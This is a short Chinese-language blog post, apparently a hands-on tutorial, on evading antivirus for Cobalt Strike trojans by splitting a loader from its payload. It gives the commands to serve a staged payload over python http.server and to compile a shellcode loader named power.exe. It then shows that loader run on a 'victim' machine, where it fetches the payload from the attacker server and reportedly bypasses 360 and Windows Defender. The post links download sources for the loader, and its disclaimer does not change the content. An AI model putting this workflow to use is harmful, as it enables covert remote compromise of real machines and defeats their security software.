CS木马分离免杀实操(过360，火狐和WindowsDefinder)（4月2日更...

Auguest

免责声明
请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，作者不为此承担任何责任。工具来自网络，安全性自测，如有侵权请联系删除。
0x01 工具介绍

分离免杀：木马加载器和payload载荷分开，仅仅上传制作的好的加载器即可，通过对加载器的控制，使其加载放置在远程服务器上的木马。当然也并非使用自己制作的木马加载器，像白加黑（白程序，黑DLL），这种依靠系统执行DLL的方式，更加有效，但需要找到能够利用的dll文件，还有存在其他的限制，以后有机会分享一下。

实操环境：Linux : CS 服务端（192.168.1.220）Win11 : CS 客户端（192.168.1.212）Win 7 : 实验受害者（192.168.1.57）

0x02 安装与使用

1.Linux开启CS服务端，选择阶段载荷，点击ram，生成 .bin 后缀格式payload。


2. 将生成的payload 放置在linux CS服务端主机上，任意文件夹都可以，在该文件夹中开启http服务（一般使用python就可以了）命令：python3 -m http.server 8880 （这里注意一下python3和python2开启http服务不同，根据自己环境来）。


3. 加载器的准备：使用命令（文件muma.cpp，文章底部链接下载即可）：x86_64-w64-mingw32-g++ –static -o power.exe muma.cpp -fpermissive -lws2_32 生成 power.exe 加载器，将加载器上传至受害机Win 7 中。


4. 免杀测试：将加载器power.exe 上传至 受害机后，开启各类EDR，尝试上线CS，命令：power.exe 192.168.1.220 8880 payload_x64.bin ，CS成功上线，且正常执行命令。



5. 下载链接：Github项目地址：https://github.com/xjsafe/ShellCode_Loader
0x03 项目链接下载
1、通过阅读原文，到项目地址下载
2、网盘下载链接：https://pan.quark.cn/s/b7890e9ad389